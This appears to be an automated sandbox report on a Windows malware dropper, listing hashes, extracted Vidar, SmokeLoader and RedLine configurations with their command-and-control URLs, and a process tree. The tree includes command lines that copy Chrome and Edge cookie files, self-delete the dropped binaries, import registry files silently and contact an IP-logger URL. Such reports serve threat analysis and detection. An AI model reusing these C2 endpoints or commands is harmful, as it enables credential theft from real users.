Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    86s
  • max time network
    310s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    20-07-2021 09:26

General

  • Target

    8 (17).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

AniNEW

C2

akedauiver.xyz:80

Extracted

Family

redline

Botnet

sel16

C2

dwarimlari.xyz:80

Extracted

Family

redline

Botnet

sel17

C2

dwarimlari.xyz:80

Extracted

Family

redline

Botnet

1

C2

ynabrdosmc.xyz:80

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 9 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 8 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • redlinestealer 9 IoCs

    RedlineStealer.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 3 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 52 IoCs
  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 11 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 18 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 7 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 20 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 7 IoCs
  • Kills process with taskkill 11 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry class 18 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs .reg file with regedit 2 IoCs
  • Runs ping.exe 1 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
    1⤵
      PID:1900
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2688
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2524
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2508
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
            PID:2372
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
            1⤵
              PID:2360
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1436
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1344
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1276
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1092
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:1032
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                      1⤵
                        PID:340
                      • C:\Users\Admin\AppData\Local\Temp\8 (17).exe
                        "C:\Users\Admin\AppData\Local\Temp\8 (17).exe"
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:580
                        • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                          "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of WriteProcessMemory
                          PID:992
                          • C:\Users\Admin\AppData\Local\Temp\7zS0E3BB544\setup_install.exe
                            "C:\Users\Admin\AppData\Local\Temp\7zS0E3BB544\setup_install.exe"
                            3⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of WriteProcessMemory
                            PID:3588
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c sonia_1.exe
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:1268
                              • C:\Users\Admin\AppData\Local\Temp\7zS0E3BB544\sonia_1.exe
                                sonia_1.exe
                                5⤵
                                  PID:3872
                                  • C:\Users\Admin\AppData\Local\Temp\7zS0E3BB544\sonia_1.exe
                                    "C:\Users\Admin\AppData\Local\Temp\7zS0E3BB544\sonia_1.exe" -a
                                    6⤵
                                    • Executes dropped EXE
                                    PID:2560
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c sonia_2.exe
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:1264
                                • C:\Users\Admin\AppData\Local\Temp\7zS0E3BB544\sonia_2.exe
                                  sonia_2.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Checks SCSI registry key(s)
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious behavior: MapViewOfSection
                                  PID:2088
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c sonia_3.exe
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:2080
                                • C:\Users\Admin\AppData\Local\Temp\7zS0E3BB544\sonia_3.exe
                                  sonia_3.exe
                                  5⤵
                                  • Executes dropped EXE
                                  PID:2024
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c taskkill /im sonia_3.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS0E3BB544\sonia_3.exe" & del C:\ProgramData\*.dll & exit
                                    6⤵
                                      PID:4568
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /im sonia_3.exe /f
                                        7⤵
                                        • Kills process with taskkill
                                        PID:4432
                                      • C:\Windows\SysWOW64\timeout.exe
                                        timeout /t 6
                                        7⤵
                                        • Delays execution with timeout.exe
                                        PID:4968
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c sonia_4.exe
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:744
                                  • C:\Users\Admin\AppData\Local\Temp\7zS0E3BB544\sonia_4.exe
                                    sonia_4.exe
                                    5⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2008
                                    • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                      "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                      6⤵
                                        PID:4292
                                        • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                          "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          PID:4468
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            8⤵
                                            • Executes dropped EXE
                                            PID:4648
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            8⤵
                                            • Executes dropped EXE
                                            PID:4732
                                        • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                          "C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:4500
                                          • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                            C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                            8⤵
                                            • Executes dropped EXE
                                            PID:4880
                                        • C:\Users\Admin\AppData\Local\Temp\setup 326.exe
                                          "C:\Users\Admin\AppData\Local\Temp\setup 326.exe"
                                          7⤵
                                            PID:4560
                                            • C:\Windows\winnetdriv.exe
                                              "C:\Users\Admin\AppData\Local\Temp\setup 326.exe" 1626780679 0
                                              8⤵
                                              • Executes dropped EXE
                                              PID:4716
                                          • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                            "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            PID:4628
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 764
                                              8⤵
                                              • Drops file in Windows directory
                                              • Program crash
                                              PID:1264
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 840
                                              8⤵
                                              • Program crash
                                              PID:4420
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 892
                                              8⤵
                                              • Program crash
                                              PID:4744
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 1056
                                              8⤵
                                              • Program crash
                                              PID:4604
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 1088
                                              8⤵
                                              • Program crash
                                              PID:4972
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 1008
                                              8⤵
                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                              • Program crash
                                              PID:4752
                                          • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                                            "C:\Users\Admin\AppData\Local\Temp\zhangd.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            PID:4704
                                            • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                                              "C:\Users\Admin\AppData\Local\Temp\zhangd.exe" -a
                                              8⤵
                                              • Executes dropped EXE
                                              PID:4928
                                          • C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe
                                            "C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            PID:4808
                                            • C:\Windows\system32\WerFault.exe
                                              C:\Windows\system32\WerFault.exe -u -p 4808 -s 1008
                                              8⤵
                                              • Program crash
                                              PID:5008
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c sonia_6.exe
                                      4⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:644
                                      • C:\Users\Admin\AppData\Local\Temp\7zS0E3BB544\sonia_6.exe
                                        sonia_6.exe
                                        5⤵
                                        • Executes dropped EXE
                                        • Adds Run key to start application
                                        PID:1808
                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          6⤵
                                          • Executes dropped EXE
                                          PID:4160
                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          6⤵
                                            PID:5072
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c sonia_7.exe
                                        4⤵
                                          PID:2432
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c sonia_5.exe
                                          4⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:640
                                          • C:\Users\Admin\AppData\Local\Temp\7zS0E3BB544\sonia_5.exe
                                            sonia_5.exe
                                            5⤵
                                            • Executes dropped EXE
                                            PID:3980
                                            • C:\Users\Admin\Documents\n2kgkUkurNPfZ4rPkRDiCZ8D.exe
                                              "C:\Users\Admin\Documents\n2kgkUkurNPfZ4rPkRDiCZ8D.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              PID:2368
                                              • C:\Users\Admin\Documents\n2kgkUkurNPfZ4rPkRDiCZ8D.exe
                                                C:\Users\Admin\Documents\n2kgkUkurNPfZ4rPkRDiCZ8D.exe
                                                7⤵
                                                • Executes dropped EXE
                                                PID:4936
                                              • C:\Users\Admin\Documents\n2kgkUkurNPfZ4rPkRDiCZ8D.exe
                                                C:\Users\Admin\Documents\n2kgkUkurNPfZ4rPkRDiCZ8D.exe
                                                7⤵
                                                • Executes dropped EXE
                                                PID:3560
                                            • C:\Users\Admin\Documents\Xmvosi3S5q9s1vf70AuTRMP7.exe
                                              "C:\Users\Admin\Documents\Xmvosi3S5q9s1vf70AuTRMP7.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              PID:5072
                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                7⤵
                                                  PID:4896
                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:4652
                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  7⤵
                                                    PID:3232
                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    7⤵
                                                      PID:5588
                                                  • C:\Users\Admin\Documents\HXrtv0q1weP6XdDKKQDdsKLU.exe
                                                    "C:\Users\Admin\Documents\HXrtv0q1weP6XdDKKQDdsKLU.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    PID:2164
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp
                                                      7⤵
                                                      • Executes dropped EXE
                                                      PID:4292
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd
                                                        8⤵
                                                          PID:2668
                                                          • C:\Windows\SysWOW64\findstr.exe
                                                            findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp
                                                            9⤵
                                                              PID:4696
                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                              Acre.exe.com k
                                                              9⤵
                                                                PID:5300
                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                  10⤵
                                                                    PID:5508
                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                  ping 127.0.0.1 -n 30
                                                                  9⤵
                                                                  • Runs ping.exe
                                                                  PID:5452
                                                          • C:\Users\Admin\Documents\TLtJwuDoEyPraHCIZGosB9Ho.exe
                                                            "C:\Users\Admin\Documents\TLtJwuDoEyPraHCIZGosB9Ho.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Checks BIOS information in registry
                                                            • Checks whether UAC is enabled
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            PID:4552
                                                            • C:\Users\Admin\AppData\Roaming\1234.exe
                                                              C:\Users\Admin\AppData\Roaming\1234.exe 1234
                                                              7⤵
                                                                PID:5700
                                                                • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                  "{path}"
                                                                  8⤵
                                                                    PID:4572
                                                                  • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                    "{path}"
                                                                    8⤵
                                                                      PID:6236
                                                                • C:\Users\Admin\Documents\umiUzFrs4gEnSYdmcdKYTnJ1.exe
                                                                  "C:\Users\Admin\Documents\umiUzFrs4gEnSYdmcdKYTnJ1.exe"
                                                                  6⤵
                                                                    PID:4544
                                                                    • C:\Users\Admin\Documents\umiUzFrs4gEnSYdmcdKYTnJ1.exe
                                                                      C:\Users\Admin\Documents\umiUzFrs4gEnSYdmcdKYTnJ1.exe
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      • Checks processor information in registry
                                                                      • Modifies system certificate store
                                                                      PID:2024
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im umiUzFrs4gEnSYdmcdKYTnJ1.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\umiUzFrs4gEnSYdmcdKYTnJ1.exe" & del C:\ProgramData\*.dll & exit
                                                                        8⤵
                                                                          PID:5156
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /im umiUzFrs4gEnSYdmcdKYTnJ1.exe /f
                                                                            9⤵
                                                                            • Kills process with taskkill
                                                                            PID:5036
                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                            timeout /t 6
                                                                            9⤵
                                                                            • Delays execution with timeout.exe
                                                                            PID:5312
                                                                    • C:\Users\Admin\Documents\qYin2YjUF_hPJGJtZlmUnOga.exe
                                                                      "C:\Users\Admin\Documents\qYin2YjUF_hPJGJtZlmUnOga.exe"
                                                                      6⤵
                                                                        PID:4756
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\EverestSoftrade\TonerRecover\log.bat" "
                                                                          7⤵
                                                                            PID:4944
                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                              explorer https://iplogger.org/2LBCU6
                                                                              8⤵
                                                                                PID:3976
                                                                              • C:\Windows\SysWOW64\regedit.exe
                                                                                regedit /s adj.reg
                                                                                8⤵
                                                                                • Runs .reg file with regedit
                                                                                PID:6984
                                                                              • C:\Windows\SysWOW64\regedit.exe
                                                                                regedit /s adj2.reg
                                                                                8⤵
                                                                                • Runs .reg file with regedit
                                                                                PID:3976
                                                                            • C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe
                                                                              "C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe"
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:3772
                                                                          • C:\Users\Admin\Documents\xvWUdDHlnd01TXDYO2PCFErZ.exe
                                                                            "C:\Users\Admin\Documents\xvWUdDHlnd01TXDYO2PCFErZ.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:4504
                                                                            • C:\Users\Admin\Documents\xvWUdDHlnd01TXDYO2PCFErZ.exe
                                                                              C:\Users\Admin\Documents\xvWUdDHlnd01TXDYO2PCFErZ.exe
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:4804
                                                                          • C:\Users\Admin\Documents\AAd0pxF1GB3yLUEniOe8fRZV.exe
                                                                            "C:\Users\Admin\Documents\AAd0pxF1GB3yLUEniOe8fRZV.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:3356
                                                                            • C:\Users\Admin\Documents\AAd0pxF1GB3yLUEniOe8fRZV.exe
                                                                              C:\Users\Admin\Documents\AAd0pxF1GB3yLUEniOe8fRZV.exe
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:4316
                                                                          • C:\Users\Admin\Documents\Y42RALenFtxiXTQcfOrTbrCk.exe
                                                                            "C:\Users\Admin\Documents\Y42RALenFtxiXTQcfOrTbrCk.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            PID:3668
                                                                            • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:4568
                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS8D1D66E5\setup_install.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\7zS8D1D66E5\setup_install.exe"
                                                                                8⤵
                                                                                  PID:4864
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c karotima_1.exe
                                                                                    9⤵
                                                                                      PID:5184
                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8D1D66E5\karotima_1.exe
                                                                                        karotima_1.exe
                                                                                        10⤵
                                                                                          PID:5232
                                                                                          • C:\Users\Admin\Documents\iuK25qmgBrW9vZAY7xxaQxaP.exe
                                                                                            "C:\Users\Admin\Documents\iuK25qmgBrW9vZAY7xxaQxaP.exe"
                                                                                            11⤵
                                                                                              PID:5052
                                                                                              • C:\Users\Admin\Documents\iuK25qmgBrW9vZAY7xxaQxaP.exe
                                                                                                C:\Users\Admin\Documents\iuK25qmgBrW9vZAY7xxaQxaP.exe
                                                                                                12⤵
                                                                                                  PID:3100
                                                                                              • C:\Users\Admin\Documents\dkvzqGenhgZsn9kTgp29EtzW.exe
                                                                                                "C:\Users\Admin\Documents\dkvzqGenhgZsn9kTgp29EtzW.exe"
                                                                                                11⤵
                                                                                                  PID:3888
                                                                                                  • C:\Users\Admin\Documents\dkvzqGenhgZsn9kTgp29EtzW.exe
                                                                                                    C:\Users\Admin\Documents\dkvzqGenhgZsn9kTgp29EtzW.exe
                                                                                                    12⤵
                                                                                                      PID:4820
                                                                                                  • C:\Users\Admin\Documents\H6BqqaIbVSzKExSulJShGSsT.exe
                                                                                                    "C:\Users\Admin\Documents\H6BqqaIbVSzKExSulJShGSsT.exe"
                                                                                                    11⤵
                                                                                                      PID:4112
                                                                                                    • C:\Users\Admin\Documents\KIheDYNbfgdOx4mRlwkNctFq.exe
                                                                                                      "C:\Users\Admin\Documents\KIheDYNbfgdOx4mRlwkNctFq.exe"
                                                                                                      11⤵
                                                                                                        PID:4308
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp
                                                                                                          12⤵
                                                                                                            PID:5952
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              cmd
                                                                                                              13⤵
                                                                                                                PID:5228
                                                                                                                • C:\Windows\SysWOW64\findstr.exe
                                                                                                                  findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp
                                                                                                                  14⤵
                                                                                                                    PID:5040
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com
                                                                                                                    Acre.exe.com k
                                                                                                                    14⤵
                                                                                                                      PID:5036
                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                      ping 127.0.0.1 -n 30
                                                                                                                      14⤵
                                                                                                                      • Runs ping.exe
                                                                                                                      PID:4800
                                                                                                              • C:\Users\Admin\Documents\bzEIwO3oroX6nILwsQD4DxLq.exe
                                                                                                                "C:\Users\Admin\Documents\bzEIwO3oroX6nILwsQD4DxLq.exe"
                                                                                                                11⤵
                                                                                                                  PID:4196
                                                                                                                  • C:\Users\Admin\Documents\bzEIwO3oroX6nILwsQD4DxLq.exe
                                                                                                                    C:\Users\Admin\Documents\bzEIwO3oroX6nILwsQD4DxLq.exe
                                                                                                                    12⤵
                                                                                                                      PID:6744
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im bzEIwO3oroX6nILwsQD4DxLq.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\bzEIwO3oroX6nILwsQD4DxLq.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                        13⤵
                                                                                                                          PID:308
                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                            taskkill /im bzEIwO3oroX6nILwsQD4DxLq.exe /f
                                                                                                                            14⤵
                                                                                                                            • Kills process with taskkill
                                                                                                                            PID:4864
                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                            timeout /t 6
                                                                                                                            14⤵
                                                                                                                            • Delays execution with timeout.exe
                                                                                                                            PID:6280
                                                                                                                      • C:\Users\Admin\Documents\bzEIwO3oroX6nILwsQD4DxLq.exe
                                                                                                                        C:\Users\Admin\Documents\bzEIwO3oroX6nILwsQD4DxLq.exe
                                                                                                                        12⤵
                                                                                                                          PID:6740
                                                                                                                      • C:\Users\Admin\Documents\IHOVutvjMRMn2zP7LogGzeG1.exe
                                                                                                                        "C:\Users\Admin\Documents\IHOVutvjMRMn2zP7LogGzeG1.exe"
                                                                                                                        11⤵
                                                                                                                          PID:5880
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                            12⤵
                                                                                                                              PID:5804
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                              12⤵
                                                                                                                                PID:5204
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                12⤵
                                                                                                                                  PID:6896
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                  12⤵
                                                                                                                                    PID:6680
                                                                                                                                • C:\Users\Admin\Documents\Ot_SlZtzmaFSxP7pOl2X6IGo.exe
                                                                                                                                  "C:\Users\Admin\Documents\Ot_SlZtzmaFSxP7pOl2X6IGo.exe"
                                                                                                                                  11⤵
                                                                                                                                    PID:3980
